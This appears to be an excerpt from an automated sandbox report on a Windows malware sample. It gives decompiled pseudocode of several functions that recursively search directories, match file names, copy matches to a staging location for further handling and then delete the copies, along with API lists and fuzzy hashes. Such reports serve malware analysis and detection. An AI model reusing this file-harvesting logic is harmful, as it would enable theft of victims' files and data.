				struct _WIN32_FIND_DATAA _v596;
				char _v860;
				char _v1124;
				char _v1388;
				void* _t121;
				signed int _t122;
				int _t124;
				signed int _t126;
				intOrPtr _t129;
				intOrPtr _t132;
				intOrPtr _t134;
				void* _t146;
				intOrPtr _t200;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t276;

				_push(_a8);
				wsprintfA( &_v268, "%s\*");
				_t273 = _t272 + 0xc;
				_t121 = FindFirstFileA( &_v268,  &_v596);
				_v272 = _t121;
				if(_v272 != 0xffffffff) {
					goto L2;
				} else {
					return _t121;
				}
				do {
					L2:
					_t122 =  *0x41aa4c( &(_v596.cFileName), 0x414010);
					__eflags = _t122;
					if(_t122 == 0) {
						L4:
						goto L22;
					}
					_t126 =  *0x41aa4c( &(_v596.cFileName), 0x414014);
					__eflags = _t126;
					if(_t126 != 0) {
						wsprintfA( &_v860, "%s\%s");
						_t273 = _t273 + 0x10;
						_t129 =  *0x41a534; // 0x6285d8
						__eflags =  *0x41aa4c( &(_v596.cFileName), _t129, _a8,  &(_v596.cFileName));
						if(__eflags != 0) {
							_t200 =  *0x41a050; // 0x6293c8
							__eflags =  *0x41aa4c( &(_v596.cFileName), _t200);
							if(__eflags != 0) {
								_t132 =  *0x41a5ac; // 0x628428
								__eflags =  *0x41aa4c( &(_v596.cFileName), _t132);
								if(__eflags != 0) {
									_t134 =  *0x41a360; // 0x629428
									__eflags =  *0x41aa4c( &(_v596.cFileName), _t134);
									if(__eflags != 0) {
										__eflags = _v596.dwFileAttributes & 0x00000010;
										if((_v596.dwFileAttributes & 0x00000010) != 0) {
											E004087E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
											_t273 = _t273 + 0x24;
										}
									} else {
										GetCurrentDirectoryA(0x104,  &_v1388);
										 *0x41aa24( &_v1388, 0x414018);
										_t146 = E0040B8B0( &(_v596.cFileName), __eflags, 8);
										_t274 = _t273 + 4;
										 *0x41aa24( &_v1388, _t146);
										CopyFileA( &_v860,  &_v1388, 1);
										__eflags = _a36;
										if(__eflags != 0) {
											E00408510(_a12, __eflags,  &_v1388, _a4, _a12, _a16, _a20, _a24);
											_t274 = _t274 + 0x18;
										}
										__eflags = _a28;
										if(__eflags != 0) {
											E00408650(_a12, __eflags,  &_v1388, _a4, _a12, _a16, _a20, _a24);
											_t274 = _t274 + 0x18;
										}
										DeleteFileA( &_v1388);
										E0040B720( &_v1388, 0x104);
										E004087E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
										_t273 = _t274 + 0x24;
									}
								} else {
									GetCurrentDirectoryA(0x104,  &_v1124);
									 *0x41aa24( &_v1124, 0x414018);
									 *0x41aa24( &_v1124, E0040B8B0( &(_v596.cFileName), __eflags, 8));
									CopyFileA( &_v860,  &_v1124, 1);
									E004082E0(_a12, __eflags,  &_v1124, _a4, _a12, _a16, _a20, _a24);
									_t276 = _t273 + 0x1c;
									__eflags = _a32;
									if(__eflags != 0) {
										E00408150(_a12, __eflags,  &_v1124, _a4, _a12, _a16, _a20, _a24);
										_t276 = _t276 + 0x18;
									}
									DeleteFileA( &_v1124);
									E0040B720( &_v1124, 0x104);
									E004087E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
									_t273 = _t276 + 0x24;
								}
							} else {
								E00407D50(__eflags,  &_v860, _a4, _a12, _a16, _a20, _a24);
								E004087E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
								_t273 = _t273 + 0x3c;
							}
						} else {
							E00407AC0(_a12, __eflags, _a4,  &_v860, _a12, _a16, _a20);
							E004087E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
							_t273 = _t273 + 0x38;
						}
						E0040B720( &_v860, 0x104);
						goto L22;
					}
					goto L4;
					L22:
					_t124 = FindNextFileA(_v272,  &_v596);
					__eflags = _t124;
				} while (_t124 != 0);
				return FindClose(_v272);
			}

0x004087ec
0x004087f9
0x004087ff
0x00408810
0x00408816
0x00408823
0x00000000
0x00000000
0x00000000
0x00000000
0x0040882a
0x0040882a
0x00408836
0x0040883c
0x0040883e
0x00408856
0x00000000
0x00408856
0x0040884c
0x00408852
0x00408854
0x00408872
0x00408878
0x0040887b
0x0040888e
0x00408890
0x004088e8
0x004088fc
0x004088fe
0x0040895a
0x0040896d
0x0040896f
0x00408a68
0x00408a7b
0x00408a7d
0x00408b7f
0x00408b82
0x00408bae
0x00408bb3
0x00408bb3
0x00408a83
0x00408a8f
0x00408aa1
0x00408aa9
0x00408aae
0x00408ab9
0x00408acf
0x00408ad5
0x00408ad9
0x00408af6
0x00408afb
0x00408afb
0x00408afe
0x00408b02
0x00408b1f
0x00408b24
0x00408b24
0x00408b2e
0x00408b40
0x00408b6f
0x00408b74
0x00408b74
0x00408975
0x00408981
0x00408993
0x004089ab
0x004089c1
0x004089e2
0x004089e7
0x004089ea
0x004089ee
0x00408a0b
0x00408a10
0x00408a10
0x00408a1a
0x00408a2c
0x00408a5b
0x00408a60
0x00408a60
0x00408900
0x0040891b
0x0040894d
0x00408952
0x00408952
0x00408892
0x004088a9
0x004088db
0x004088e0
0x004088e0
0x00408bc2
0x00000000
0x00408bc2
0x00000000
0x00408bc7
0x00408bd5
0x00408bdb
0x00408bdb
0x00000000

APIs

wsprintfA.USER32 ref: 004087F9
FindFirstFileA.KERNEL32(?,?), ref: 00408810
StrCmpCA.SHLWAPI(?,00414010), ref: 00408836
StrCmpCA.SHLWAPI(?,00414014), ref: 0040884C
FindNextFileA.KERNEL32(000000FF,?), ref: 00408BD5
FindClose.KERNEL32(000000FF), ref: 00408BEA

Strings

%s\%s, xrefs: 00408866
%s\*, xrefs: 004087ED

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\*
API String ID: 180737720-2848263008
Opcode ID: 864204762c03cb812e489958dcffbbc39fef40720c2155e64fcd8f4357d5c54a
Instruction ID: 0b41a1abc190fb4bcf7a86ba3d7a33f51ad09bf1deba5e068821b47be1bcc9a2
Opcode Fuzzy Hash: 864204762c03cb812e489958dcffbbc39fef40720c2155e64fcd8f4357d5c54a
Instruction Fuzzy Hash: 6FD12EB2500109ABCB14DF94DD84EEB73BDAF8C704F04869DB609A3150EA74EA95CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405E40, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 215
filestringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00405E40(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char* _a20, int _a24, intOrPtr _a28, int _a32, intOrPtr _a36) {
				char _v5004;
				char _v5268;
				void* _v5272;
				struct _WIN32_FIND_DATAA _v5596;
				char _v5860;
				char _v6124;
				int _v6128;
				char _v6132;
				void* _t76;
				int _t77;
				int _t79;
				int _t81;
				int _t85;
				void* _t89;
				int _t91;
				int _t102;
				int _t103;
				int _t104;
				int _t106;
				void* _t157;
				void* _t158;
				void* _t159;

				E004139B0(0x17f0, __ecx);
				wsprintfA( &_v5268, "%s\*");
				_t158 = _t157 + 0xc;
				_v5272 = FindFirstFileA( &_v5268,  &_v5596);
				E0040B720( &_v5004, 0x1388);
				_t76 =  *0x41aa24( &_v5004, _a36, _a16);
				if(_v5272 != 0xffffffff) {
					goto L2;
				} else {
					return _t76;
				}
				do {
					L2:
					_t77 =  *0x41aa4c( &(_v5596.cFileName), 0x414010);
					__eflags = _t77;
					if(_t77 == 0) {
						L4:
						goto L25;
					}
					_t81 =  *0x41aa4c( &(_v5596.cFileName), 0x414014);
					__eflags = _t81;
					if(_t81 != 0) {
						wsprintfA( &_v6124, "%s\%s");
						_t159 = _t158 + 0x10;
						_t85 =  *0x41aa4c(_a12, 0x41401a, _a16,  &(_v5596.cFileName));
						__eflags = _t85;
						if(_t85 != 0) {
							__eflags = _a32;
							if(_a32 == 0) {
								wsprintfA( &_v5860, "%s\\%s\\%s", _a4, _a12,  &(_v5596.cFileName));
								_t158 = _t159 + 0x14;
							} else {
								_push( &(_v5596.cFileName));
								_push(_a12);
								wsprintfA( &_v5860, "%s\%s");
								_t158 = _t159 + 0x10;
							}
						} else {
							__eflags = _a32;
							if(_a32 == 0) {
								_push( &(_v5596.cFileName));
								_push(_a4);
								wsprintfA( &_v5860, "%s\%s");
								_t158 = _t159 + 0x10;
							} else {
								wsprintfA( &_v5860, 0x414024,  &(_v5596.cFileName));
								_t158 = _t159 + 0xc;
							}
						}
						_t89 =  *0x41a908( &_v5004);
						__eflags = _t89 - 3;
						if(_t89 <= 3) {
							_t91 = PathMatchSpecA( &(_v5596.cFileName), _a20);
							__eflags = _t91;
							if(_t91 != 0) {
								CopyFileA( &_v6124,  &(_v5596.cFileName), 1);
								E004137C0(_a8,  &_v5860,  &(_v5596.cFileName));
								_t158 = _t158 + 0xc;
								DeleteFileA( &(_v5596.cFileName));
							}
							L23:
							__eflags = _a24;
							if(__eflags != 0) {
								E00405E40(_a4, __eflags, _a4, _a8,  &_v5860,  &_v6124, _a20, _a24, _a28, _a32, _a36);
								_t158 = _t158 + 0x24;
							}
							goto L25;
						}
						_t102 = E0040C090( &_v5004, ",",  &_v6132);
						_t158 = _t158 + 0xc;
						_v6128 = _t102;
						while(1) {
							__eflags = _v6128;
							if(_v6128 == 0) {
								break;
							}
							_t103 =  *0x41a990( &(_v5596.cFileName), _v6128, 0);
							__eflags = _t103;
							if(_t103 == 0) {
								_t106 = PathMatchSpecA( &(_v5596.cFileName), _a20);
								__eflags = _t106;
								if(_t106 != 0) {
									CopyFileA( &_v6124,  &(_v5596.cFileName), 1);
									E004137C0(_a8,  &_v5860,  &(_v5596.cFileName));
									_t158 = _t158 + 0xc;
									DeleteFileA( &(_v5596.cFileName));
								}
							}
							_t104 = E0040C090(0, ",",  &_v6132);
							_t158 = _t158 + 0xc;
							_v6128 = _t104;
						}
						goto L23;
					}
					goto L4;
					L25:
					_t79 = FindNextFileA(_v5272,  &_v5596);
					__eflags = _t79;
				} while (_t79 != 0);
				return FindClose(_v5272);
			}

0x00405e48
0x00405e5d
0x00405e63
0x00405e7a
0x00405e8c
0x00405e9c
0x00405ea9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405eb0
0x00405eb0
0x00405ebc
0x00405ec2
0x00405ec4
0x00405edc
0x00000000
0x00405edc
0x00405ed2
0x00405ed8
0x00405eda
0x00405ef8
0x00405efe
0x00405f0a
0x00405f10
0x00405f12
0x00405f5a
0x00405f5e
0x00405f9d
0x00405fa3
0x00405f60
0x00405f66
0x00405f6a
0x00405f77
0x00405f7d
0x00405f7d
0x00405f14
0x00405f14
0x00405f18
0x00405f3e
0x00405f42
0x00405f4f
0x00405f55
0x00405f1a
0x00405f2d
0x00405f33
0x00405f33
0x00405f58
0x00405fad
0x00405fb3
0x00405fb6
0x00406084
0x0040608a
0x0040608c
0x0040609e
0x004060b6
0x004060bb
0x004060c5
0x004060c5
0x004060cb
0x004060cb
0x004060cf
0x004060fb
0x00406100
0x00406100
0x00000000
0x004060cf
0x00405fcf
0x00405fd4
0x00405fd7
0x00405fdd
0x00405fdd
0x00405fe4
0x00000000
0x00000000
0x00405ffa
0x00406000
0x00406002
0x0040600f
0x00406015
0x00406017
0x00406029
0x00406041
0x00406046
0x00406050
0x00406050
0x00406017
0x00406064
0x00406069
0x0040606c
0x0040606c
0x00000000
0x00406077
0x00000000
0x00406103
0x00406111
0x00406117
0x00406117
0x00000000

APIs

wsprintfA.USER32 ref: 00405E5D
FindFirstFileA.KERNEL32(?,?,?,00000000,?), ref: 00405E74
lstrcat.KERNEL32(?,?), ref: 00405E9C
StrCmpCA.SHLWAPI(?,00414010), ref: 00405EBC
StrCmpCA.SHLWAPI(?,00414014), ref: 00405ED2
FindNextFileA.KERNEL32(000000FF,?), ref: 00406111
FindClose.KERNEL32(000000FF), ref: 00406126

Strings

%s\%s, xrefs: 00405EEC, 00405F43, 00405F6B
%s\%s\%s, xrefs: 00405F91
%s\*, xrefs: 00405E51

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-1426491737
Opcode ID: da2c885b9076c81ca24cc3c87d12da24a82ebc38fc329cbfdd7a2e0dbf039061
Instruction ID: 0bc9b02d7ab3545e21e8315ee4c466327c2adae897de70d70c4ab632552244ce
Opcode Fuzzy Hash: da2c885b9076c81ca24cc3c87d12da24a82ebc38fc329cbfdd7a2e0dbf039061
Instruction Fuzzy Hash: A88174B5900208EFCB14DFA4DC44DEB73B8EF48745F4486A9F60A96180D7789B94CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00409970, Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 121fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00409989
FindFirstFileA.KERNEL32(?,?), ref: 004099A0
StrCmpCA.SHLWAPI(?,00414010), ref: 004099C6
StrCmpCA.SHLWAPI(?,00414014), ref: 004099DC
FindNextFileA.KERNEL32(000000FF,?), ref: 00409B20
FindClose.KERNEL32(000000FF), ref: 00409B35

Strings

%s\*, xrefs: 0040997D

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*
API String ID: 180737720-766152087
Opcode ID: d36557e83e60a98afa7e569db09bb73b01886f17925a8ce19d475cf2d8557a23
Instruction ID: f00fb7030c8b22b76076fdd7412de7885a7951318a5a6e6dd79535400c2c2ee4
Opcode Fuzzy Hash: d36557e83e60a98afa7e569db09bb73b01886f17925a8ce19d475cf2d8557a23
Instruction Fuzzy Hash: 544167B2510218ABCB10DFA0DD48EEB77B8BF4C705F04859AB20992151E778EB94CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401280, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 134
fileCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00401280(intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				char _v268;
				void* _v272;
				struct _WIN32_FIND_DATAA _v596;
				char _v860;
				char _v1124;
				char _v1388;
				char _v1652;
				void* _t43;
				intOrPtr _t66;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;

				_push(_a8);
				wsprintfA( &_v268, "%s\*");
				_t99 = _t98 + 0xc;
				_t43 = FindFirstFileA( &_v268,  &_v596);
				_v272 = _t43;
				if(_v272 != 0xffffffff) {
					do {
						_push(0x414010);
						_push( &(_v596.cFileName));
						if( *0x41aa4c() == 0) {
							L4:
							goto L11;
						}
						_push(0x414014);
						_push( &(_v596.cFileName));
						if( *0x41aa4c() != 0) {
							_push( &(_v596.cFileName));
							_push(_a8);
							wsprintfA( &_v1124, "%s\%s");
							_t100 = _t99 + 0x10;
							_push(0x41401a);
							_push(_a4);
							if( *0x41aa4c() != 0) {
								_push( &(_v596.cFileName));
								_push(_a4);
								wsprintfA( &_v860, "%s\%s");
								_t101 = _t100 + 0x10;
							} else {
								wsprintfA( &_v860, 0x414024,  &(_v596.cFileName));
								_t101 = _t100 + 0xc;
							}
							if(PathMatchSpecA( &(_v596.cFileName), _a12) != 0) {
								E0040B720( &_v1652, 0x104);
								E0040B720( &_v1388, 0x104);
								 *0x41aa24( &_v1652, _a8);
								 *0x41aa24( &_v1652, 0x414018);
								 *0x41aa24( &_v1652,  &(_v596.cFileName));
								_t66 =  *0x41a5a4; // 0x627920
								 *0x41aa24( &_v1388, _t66);
								 *0x41aa24( &_v1388,  &_v860);
								E004137C0(_a16,  &_v1388,  &_v1652);
								_t101 = _t101 + 0xc;
							}
							E00401280( &_v860,  &_v1124, _a12, _a16);
							_t99 = _t101 + 0x10;
							goto L11;
						}
						goto L4;
						L11:
					} while (FindNextFileA(_v272,  &_v596) != 0);
					return FindClose(_v272);
				}
				return _t43;
			}

0x0040128c
0x00401299
0x0040129f
0x004012b0
0x004012b6
0x004012c3
0x004012ca
0x004012ca
0x004012d5
0x004012de
0x004012f6
0x00000000
0x004012f6
0x004012e0
0x004012eb
0x004012f4
0x00401301
0x00401305
0x00401312
0x00401318
0x0040131b
0x00401323
0x0040132c
0x00401352
0x00401356
0x00401363
0x00401369
0x0040132e
0x00401341
0x00401347
0x00401347
0x0040137f
0x00401391
0x004013a2
0x004013b2
0x004013c4
0x004013d8
0x004013de
0x004013eb
0x004013ff
0x00401417
0x0040141c
0x0040141c
0x00401435
0x0040143a
0x00000000
0x0040143a
0x00000000
0x0040143d
0x00401451
0x00000000
0x00401460
0x00000000

APIs

wsprintfA.USER32 ref: 00401299
FindFirstFileA.KERNEL32(?,?), ref: 004012B0
StrCmpCA.SHLWAPI(?,00414010), ref: 004012D6
StrCmpCA.SHLWAPI(?,00414014), ref: 004012EC
FindNextFileA.KERNEL32(000000FF,?), ref: 0040144B
FindClose.KERNEL32(000000FF), ref: 00401460

Strings

yb, xrefs: 004013DE
%s\%s, xrefs: 00401306, 00401357
%s\*, xrefs: 0040128D

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: yb$%s\%s$%s\*
API String ID: 180737720-2581404327
Opcode ID: 9a946c6c1b585fb6ecffd09ad8bd87ccec9506f78aa8e12e69a80bbcdc18ab01
Instruction ID: 4cd9f1fc2f596726c4666f8bf9c741da0555b1e74a9e6087d7d803036aaf4599
Opcode Fuzzy Hash: 9a946c6c1b585fb6ecffd09ad8bd87ccec9506f78aa8e12e69a80bbcdc18ab01
Instruction Fuzzy Hash: 56518672500218ABCB10DFA0DD48EEA73B8BF4C705F0485A9B609A3150E779EB94CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00401090, Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetCurrentDirectoryA.KERNEL32(?), ref: 0040109D
wsprintfA.USER32 ref: 004010B7
FindFirstFileA.KERNEL32(?,?), ref: 004010CE
StrCmpCA.SHLWAPI(?,00414010), ref: 004010F4
StrCmpCA.SHLWAPI(?,00414014), ref: 0040110A
FindNextFileA.KERNEL32(000000FF,?), ref: 004011D3
FindClose.KERNEL32(000000FF), ref: 004011E8

Strings

yb, xrefs: 00401160
%s\%s, xrefs: 004010AB

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Find$File$CloseCurrentDirectoryFirstNextwsprintf
String ID: yb$%s\%s
API String ID: 2809309208-1661046505
Opcode ID: f0159c76561ba8365bb9aa6ad5d25ded7c9edc9d81d80b2b2d7af7a0a2787976
Instruction ID: 7ffd25992613dc01ae9c6896dea76ef306beac36bf0277a1da173af701ae58c0
Opcode Fuzzy Hash: f0159c76561ba8365bb9aa6ad5d25ded7c9edc9d81d80b2b2d7af7a0a2787976
Instruction Fuzzy Hash: C63177B6500218ABCB14DFE0DD88EEA77BCAF4C705F0085AAB609A2150DB78D794CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004096E0, Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 213
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004096E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28) {
				char _v268;
				void* _v272;
				struct _WIN32_FIND_DATAA _v596;
				char _v860;
				void* _t76;
				signed int _t77;
				int _t79;
				signed int _t81;
				intOrPtr _t84;
				signed int _t86;
				signed int _t88;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t122;
				intOrPtr _t146;
				void* _t166;
				void* _t167;

				_push(_a8);
				wsprintfA( &_v268, "%s\*");
				_t167 = _t166 + 0xc;
				_t76 = FindFirstFileA( &_v268,  &_v596);
				_v272 = _t76;
				if(_v272 != 0xffffffff) {
					goto L2;
				} else {
					return _t76;
				}
				do {
					L2:
					_t77 =  *0x41aa4c( &(_v596.cFileName), 0x414010);
					__eflags = _t77;
					if(_t77 == 0) {
						L4:
						goto L19;
					}
					_t81 =  *0x41aa4c( &(_v596.cFileName), 0x414014);
					__eflags = _t81;
					if(_t81 != 0) {
						wsprintfA( &_v860, "%s\%s");
						_t167 = _t167 + 0x10;
						_t84 =  *0x41a4cc; // 0x628458
						__eflags =  *0x41aa4c( &(_v596.cFileName), _t84, _a8,  &(_v596.cFileName));
						if(__eflags != 0) {
							_t122 =  *0x41a030; // 0x628fc0
							_t86 =  *0x41aa4c( &(_v596.cFileName), _t122);
							__eflags = _t86;
							if(_t86 != 0) {
								_t146 =  *0x41a7e4; // 0x6283c8
								_t88 =  *0x41aa4c( &(_v596.cFileName), _t146);
								__eflags = _t88;
								if(_t88 != 0) {
									_t89 =  *0x41a0d4; // 0x6284a0
									_t90 =  *0x41aa4c( &(_v596.cFileName), _t89);
									__eflags = _t90;
									if(_t90 != 0) {
										__eflags = _v596.dwFileAttributes & 0x00000010;
										if((_v596.dwFileAttributes & 0x00000010) != 0) {
											E004096E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28);
											_t167 = _t167 + 0x1c;
										}
									} else {
										__eflags = _a28;
										if(__eflags != 0) {
											E00409590(_a4, __eflags,  &_v860, _a4, _a12, _a16);
											_t167 = _t167 + 0x10;
										}
										E004096E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28);
										_t167 = _t167 + 0x1c;
									}
								} else {
									_push(_a16);
									E00409060(_a4, _a4, _a12, _a8);
									E004096E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28);
									_t167 = _t167 + 0x2c;
								}
							} else {
								__eflags = _a24;
								if(__eflags != 0) {
									E00409400(_a12, __eflags,  &_v860, _a4, _a12, _a16);
									_t167 = _t167 + 0x10;
								}
								E004096E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28);
								_t167 = _t167 + 0x1c;
							}
						} else {
							E00408C00(_a4, __eflags,  &_v860, _a4, _a12, _a16);
							E004096E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28);
							_t167 = _t167 + 0x2c;
						}
						goto L19;
					}
					goto L4;
					L19:
					_t79 = FindNextFileA(_v272,  &_v596);
					__eflags = _t79;
				} while (_t79 != 0);
				return FindClose(_v272);
			}

0x004096ec
0x004096f9
0x004096ff
0x00409710
0x00409716
0x00409723
0x00000000
0x00000000
0x00000000
0x00000000
0x0040972a
0x0040972a
0x00409736
0x0040973c
0x0040973e
0x00409756
0x00000000
0x00409756
0x0040974c
0x00409752
0x00409754
0x00409772
0x00409778
0x0040977b
0x0040978e
0x00409790
0x004097dc
0x004097ea
0x004097f0
0x004097f2
0x00409844
0x00409852
0x00409858
0x0040985a
0x004098a3
0x004098b0
0x004098b6
0x004098b8
0x0040990d
0x00409910
0x00409934
0x00409939
0x00409939
0x004098ba
0x004098ba
0x004098be
0x004098d3
0x004098d8
0x004098d8
0x004098fd
0x00409902
0x00409902
0x0040985c
0x0040985f
0x0040986c
0x00409896
0x0040989b
0x0040989b
0x004097f4
0x004097f4
0x004097f8
0x0040980d
0x00409812
0x00409812
0x00409837
0x0040983c
0x0040983c
0x00409792
0x004097a5
0x004097cf
0x004097d4
0x004097d4
0x00000000
0x00409790
0x00000000
0x0040993c
0x0040994a
0x00409950
0x00409950
0x00000000

APIs

wsprintfA.USER32 ref: 004096F9
FindFirstFileA.KERNEL32(?,?), ref: 00409710
StrCmpCA.SHLWAPI(?,00414010), ref: 00409736
StrCmpCA.SHLWAPI(?,00414014), ref: 0040974C
FindNextFileA.KERNEL32(000000FF,?), ref: 0040994A
FindClose.KERNEL32(000000FF), ref: 0040995F

Strings

%s\%s, xrefs: 00409766
%s\*, xrefs: 004096ED

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\*
API String ID: 180737720-2848263008
Opcode ID: 5368e8b786ea03139a50106a3f224b7a5846eb6f2b8c7c17a6f5a730a81b7aca
Instruction ID: 1519fd6f9f5c0b483e7b6c5176f88e596ecfd98fd3e89c67d3b1837449ae925a
Opcode Fuzzy Hash: 5368e8b786ea03139a50106a3f224b7a5846eb6f2b8c7c17a6f5a730a81b7aca
Instruction Fuzzy Hash: FE810EB2510109ABCB14DF99DC84EEB73BDAF8C700F04855DBA09A3251E638EE55CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00409B40, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 183
fileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00409B40(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v268;
				void* _v272;
				struct _WIN32_FIND_DATAA _v596;
				char _v860;
				char _v1124;
				char _v1388;
				char _v1652;
				char _v1916;
				char _v2180;
				void* _t57;
				CHAR* _t64;
				CHAR* _t66;
				void* _t78;
				void* _t80;
				void* _t82;
				CHAR* _t106;
				CHAR* _t107;
				CHAR* _t121;
				CHAR* _t122;
				void* _t135;
				void* _t136;
				void* _t143;
				void* _t144;

				wsprintfA( &_v268, "%s\\*.*", _a12);
				_t136 = _t135 + 0xc;
				_t57 = FindFirstFileA( &_v268,  &_v596);
				_v272 = _t57;
				if(_v272 != 0xffffffff) {
					do {
						_push(0x414010);
						_push( &(_v596.cFileName));
						if( *0x41aa4c() == 0) {
							L4:
							goto L12;
						}
						_push(0x414014);
						_push( &(_v596.cFileName));
						if( *0x41aa4c() != 0) {
							_t64 =  *0x41a39c; // 0x62a2e8
							wsprintfA( &_v1124, _t64, _a12,  &(_v596.cFileName), _a4);
							_t66 =  *0x41a6d4; // 0x6296a8
							wsprintfA( &_v1652, _t66,  &_v1124);
							_t121 =  *0x41a59c; // 0x62a3d8
							wsprintfA( &_v1388, _t121, _a12,  &(_v596.cFileName), _a4);
							_t122 =  *0x41a6d4; // 0x6296a8
							wsprintfA( &_v2180, _t122,  &_v1388);
							_t106 =  *0x41a1d8; // 0x623588
							wsprintfA( &_v1916, _t106, _a12,  &(_v596.cFileName), _a4);
							_t107 =  *0x41a6d4; // 0x6296a8
							wsprintfA( &_v860, _t107,  &_v1916);
							_t78 = E0040BB70( &_v1652);
							_t143 = _t136 + 0x64;
							if(_t78 != 0) {
								E00409970( &_v1124, _a8, _a16,  &(_v596.cFileName), _a20);
								_t143 = _t143 + 0x14;
							}
							_t80 = E0040BB70( &_v2180);
							_t144 = _t143 + 4;
							if(_t80 != 0) {
								E00409970( &_v1388, _a8, _a16,  &(_v596.cFileName), _a20);
								_t144 = _t144 + 0x14;
							}
							_t82 = E0040BB70( &_v860);
							_t136 = _t144 + 4;
							if(_t82 != 0) {
								E00409970( &_v1916, _a8, _a16,  &(_v596.cFileName), _a20);
								_t136 = _t136 + 0x14;
							}
							E0040B720( &_v1124, 0x104);
							E0040B720( &_v1652, 0x104);
							E0040B720( &_v1388, 0x104);
							E0040B720( &_v2180, 0x104);
							E0040B720( &_v1916, 0x104);
							E0040B720( &_v860, 0x104);
							goto L12;
						}
						goto L4;
						L12:
					} while (FindNextFileA(_v272,  &_v596) != 0);
					return FindClose(_v272);
				}
				return _t57;
			}

0x00409b59
0x00409b5f
0x00409b70
0x00409b76
0x00409b83
0x00409b8a
0x00409b8a
0x00409b95
0x00409b9e
0x00409bb6
0x00000000
0x00409bb6
0x00409ba0
0x00409bab
0x00409bb4
0x00409bca
0x00409bd7
0x00409be7
0x00409bf4
0x00409c0c
0x00409c1a
0x00409c2a
0x00409c38
0x00409c50
0x00409c5e
0x00409c6e
0x00409c7c
0x00409c8c
0x00409c91
0x00409c96
0x00409cb2
0x00409cb7
0x00409cb7
0x00409cc1
0x00409cc6
0x00409ccb
0x00409ce7
0x00409cec
0x00409cec
0x00409cf6
0x00409cfb
0x00409d00
0x00409d1c
0x00409d21
0x00409d21
0x00409d30
0x00409d41
0x00409d52
0x00409d63
0x00409d74
0x00409d85
0x00000000
0x00409d85
0x00000000
0x00409d8a
0x00409d9e
0x00000000
0x00409dad
0x00000000

APIs

wsprintfA.USER32 ref: 00409B59
FindFirstFileA.KERNEL32(?,?), ref: 00409B70
